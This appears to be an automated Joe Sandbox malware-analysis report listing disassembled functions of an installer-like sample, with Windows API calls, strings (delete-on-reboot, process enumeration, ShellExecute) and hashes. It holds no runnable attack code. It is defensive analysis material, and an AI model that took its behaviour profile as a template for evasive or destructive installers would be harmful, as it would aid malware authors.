                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                    • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                    • String ID: 82D$@%F$@rD$A
                                                                    • API String ID: 3347642858-1086125096
                                                                    • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                    • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                    • API String ID: 1916479912-1189179171
                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                    Strings
                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                    • \*.*, xrefs: 00406D03
                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                    • API String ID: 2035342205-3294556389
                                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                    Strings
                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                    • API String ID: 542301482-1377821865
                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                    • API String ID: 20674999-2124804629
                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                    • String ID: @%F$N$open
                                                                    • API String ID: 3928313111-3849437375
                                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                    • API String ID: 565278875-1653569448
                                                                    • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                    • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
